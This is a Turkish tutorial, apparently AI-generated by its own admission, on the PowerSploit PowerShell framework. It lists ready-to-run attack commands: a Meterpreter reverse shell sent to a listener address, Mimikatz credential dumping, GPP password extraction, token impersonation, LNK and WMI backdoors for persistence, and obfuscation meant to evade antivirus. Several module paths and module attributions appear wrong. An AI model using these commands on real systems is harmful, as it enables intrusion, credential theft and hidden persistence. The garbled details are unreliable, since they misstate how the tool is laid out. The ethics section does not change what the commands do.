PowerSploit, Kali Linux’ta kullanılan ve PowerShell tabanlı bir saldırı ve penetrasyon testi framework’üdür. PowerSploit, Windows sistemlerinde çeşitli saldırı ve güvenlik testi senaryolarını yürütmek için kullanılır. Özellikle post-exploitation (istismar sonrası işlemler) ve bilgi toplama süreçlerinde etkilidir. PowerShell kullanarak sızma testi yapanlar için birçok yararlı modül içerir.
PowerSploit Nedir?
PowerSploit, Windows ortamında çalışan bir PowerShell framework’üdür ve güvenlik araştırmacıları tarafından çeşitli saldırılar için kullanılır. PowerSploit, bilgi toplama, istismar sonrası işlemler, gizlilik (obfuscation), yanıltma (evasion) gibi birçok modül sunar. Özellikle post-exploitation süreçlerinde etkili olan bu araç, elde edilen erişimden sonra hedef sistemdeki verileri çekmek, sistem üzerinde komutlar çalıştırmak, zafiyetli hizmetleri analiz etmek gibi çeşitli işlevler sunar.
PowerSploit’in Temel Özellikleri:
- Post-Exploitation: İstismar edilen sistemlerde daha fazla veri toplama, kalıcılık sağlama ve sistemde derinlemesine analiz yapma.
- Bilgi Toplama: Ağ keşfi, sistem bilgilerini toplama ve hedef hakkında daha fazla bilgi edinme.
- Obfuscation: PowerShell komutlarını gizlemek için kullanılabilecek araçlar.
- Yanıltma ve Bypass Teknikleri: Antivirüs ve güvenlik çözümlerini atlatma araçları.
- Kalıcılık: Hedef sistemde kalıcı erişim sağlama teknikleri.
PowerSploit, saldırı aşamalarında önemli bir rol oynayan birçok farklı modül ve betiği içerir.
PowerSploit Kurulumu
PowerSploit genellikle GitHub üzerinden manuel olarak indirilir ve Kali Linux üzerinde kullanılabilir. Aşağıda PowerSploit’in kurulumu ve kullanımı için adımlar yer almaktadır.
1. PowerSploit’i GitHub Üzerinden Yükleme
PowerSploit’in GitHub deposunu klonlayarak kurulum yapabilirsiniz:
- GitHub’dan PowerSploit’i klonlayın:
git clone https://github.com/PowerShellMafia/PowerSploit.git
- Dizine girin:
cd PowerSploit
- PowerSploit’i yüklemek: PowerSploit’in PowerShell betiklerini kullanabilmek için doğrudan PowerShell oturumu üzerinden betikleri çalıştırabilirsiniz.
PowerSploit modülleri, genellikle bir Windows makinesi üzerinde PowerShell komutları aracılığıyla çalıştırılır. Kali Linux’ta Windows sistemlere uzaktan PowerShell betikleri çalıştırmak için çeşitli araçlarla (örneğin, Empire veya Metasploit) PowerShell betiklerini gönderebilir ve çalıştırabilirsiniz.
PowerSploit Modülleri ve Kullanımı
PowerSploit, birçok farklı modül içerir. Aşağıda yaygın olarak kullanılan modüller ve betikler hakkında bilgiler bulabilirsiniz.
1. Bilgi Toplama Modülü (Recon)
Bu modül, hedef sistem hakkında bilgi toplamak için kullanılır. Sistemdeki ağ yapılandırmasını, kullanıcı bilgilerini, çalışan işlemleri ve diğer kritik bilgileri keşfetmenize yardımcı olur.
- Get-NetLocalGroup: Hedef sistemdeki yerel grupları listelemek için kullanılır.
Import-Module ./Recon/Get-NetLocalGroup.ps1
Get-NetLocalGroup -ComputerName hedefbilgisayar
- Get-NetUser: Hedef sistemdeki kullanıcı hesaplarını toplamak için kullanılır.
Import-Module ./Recon/Get-NetUser.ps1
Get-NetUser -ComputerName hedefbilgisayar
- Get-NetIP: Hedef sistemin ağ yapılandırmasını ve IP adres bilgilerini toplar.
Import-Module ./Recon/Get-NetIP.ps1
Get-NetIP -ComputerName hedefbilgisayar
2. İstismar Modülü (Exploit)
Bu modüller, hedef sistemde çeşitli saldırılar gerçekleştirmek için kullanılır. İstismar modülleri, güvenlik açığı bulunan sistemlerde kod yürütme veya ayrıcalık yükseltme işlemleri yapabilir.
- Invoke-Shellcode: Bu betik, hedef sisteme shellcode yerleştirerek komut çalıştırır.
Import-Module ./CodeExecution/Invoke-Shellcode.ps1
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443
Bu komut, hedef sisteme bir Meterpreter bağlantısı başlatır.
- Invoke-ReflectivePEInjection: Hedef sisteme PE dosyalarını (örneğin, EXE dosyalarını) hafızaya yüklemek için kullanılır.
Import-Module ./CodeExecution/Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath C:\payload.exe
3. Post-Exploitation Modülü
Bu modüller, hedef sistem üzerinde istismar sonrası işlemler yapmak için kullanılır. Örneğin, sistemdeki hassas bilgileri çalmak, kayıt defteri anahtarlarını okumak veya çalışan işlemleri izlemek için kullanılır.
- Invoke-Mimikatz: Bu betik, hedef sistemde oturum açmış kullanıcıların parolalarını ve NTLM hash’lerini elde etmek için kullanılır. Mimikatz, Windows sistemlerinde parolaları toplama konusunda çok popülerdir.
Import-Module ./Exfiltration/Invoke-Mimikatz.ps1
Invoke-Mimikatz -DumpCreds
Bu komut, Mimikatz ile parolaları ve hash’leri döker.
- Get-GPPPassword: Group Policy Preferences (GPP) şifrelerini döker. Özellikle eski sistemlerde, GPP şifrelerinin şifresiz bir şekilde saklanmasına neden olan bir zafiyetten yararlanır.
Import-Module ./Exfiltration/Get-GPPPassword.ps1
Get-GPPPassword
- Invoke-TokenManipulation: Hedef sistemde oturum jetonlarını manipüle ederek ayrıcalık yükseltme yapar.
Import-Module ./Privesc/Invoke-TokenManipulation.ps1
Invoke-TokenManipulation -ImpersonateUser
4. Kalıcılık Sağlama (Persistence)
Kalıcılık modülleri, hedef sistemde yeniden başlatmalar arasında kalıcılık sağlamak için kullanılır. Sistemdeki dosyalara, hizmetlere veya görev zamanlayıcıya zararlı kodlar ekleyerek kalıcı erişim elde edilebilir.
- Invoke-BackdoorLNK: Hedef sistemdeki kısayol dosyalarını (LNK dosyaları) manipüle ederek, sistemde kalıcılık sağlar.
Import-Module ./Persistence/Invoke-BackdoorLNK.ps1
Invoke-BackdoorLNK -LNKPath C:\Users\Public\Desktop\example.lnk
- Invoke-WMIBackdoor: WMI kullanarak hedef sistemde arka kapı açar.
Import-Module ./Persistence/Invoke-WMIBackdoor.ps1
Invoke-WMIBackdoor -Command "C:\backdoor.exe"
5. Obfuscation Modülü
Obfuscation modülleri, güvenlik yazılımlarını atlatmak için PowerShell betiklerini gizler. Bu sayede güvenlik yazılımları veya antivirüsler tarafından fark edilmeden kod çalıştırılabilir.
- Invoke-Obfuscation: PowerShell betiklerini gizlemek için kullanılır.
Import-Module ./Obfuscation/Invoke-Obfuscation.ps1
Invoke-Obfuscation -ScriptPath ./payload.ps1
Bu komut, belirtilen PowerShell betiğini karmaşık hale getirerek antivirüs ve güvenlik yazılımlarından saklamaya çalışır.
Kullanışlı PowerSploit Komutları
PowerSploit kullanırken işinizi kolaylaştıracak birkaç komut:
- Bilgi toplama (Recon):
Import-Module ./Recon/Get-NetLocalGroup.ps1
Get-NetLocalGroup -ComputerName hedefbilgisayar
- Kod yürütme (Exploit):
Import-Module ./CodeExecution/Invoke-Shellcode.ps1
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443
- Post-exploitation (Mimikatz):
Import-Module ./Exfiltration/Invoke-Mimikatz.ps1
Invoke-Mimikatz -DumpCreds
- **Kalıc
ılık sağlama**:
Import-Module ./Persistence/Invoke-WMIBackdoor.ps1
Invoke-WMIBackdoor -Command "C:\backdoor.exe"
Yasal ve Etik Kullanım
PowerSploit gibi güçlü araçlar kullanırken yasal ve etik kurallara dikkat etmek çok önemlidir. Bu tür araçlar, yalnızca izin alınan sistemlerde kullanılmalı ve kötüye kullanılmamalıdır. Yetkisiz sistemlere saldırmak yasa dışıdır ve ciddi hukuki sonuçlara neden olabilir.
- İzin Alma: PowerSploit’i yalnızca yetkili olduğunuz sistemlerde kullanın.
- Etik Kullanım: Araçları yalnızca güvenlik testleri ve eğitim amacıyla kullanın.
- Yasalara Uygunluk: Ülkenizdeki siber güvenlik yasalarına uyun.
Sonuç
PowerSploit, Windows sistemleri üzerinde güvenlik testleri ve sızma işlemleri yapmak için çok güçlü bir araç setidir. PowerShell tabanlı olması, onu Windows sistemlerde etkili bir çözüm haline getirir. Bilgi toplama, istismar, post-exploitation ve kalıcılık sağlama gibi birçok alanda kullanılabilir.
İçerik ChatGPT yapay zeka botu üzerinden alınan bilgiler doğrultusunda oluşturulmuştur. İçerikteki bilgilerin doğruluğu teyide muhtaçtır. İçerikler ile ilgili herhangi bir sorun, öneri veya şikayetiniz olduğu takdirde iletişim sayfasından yazabilirsiniz.
Yorum Yap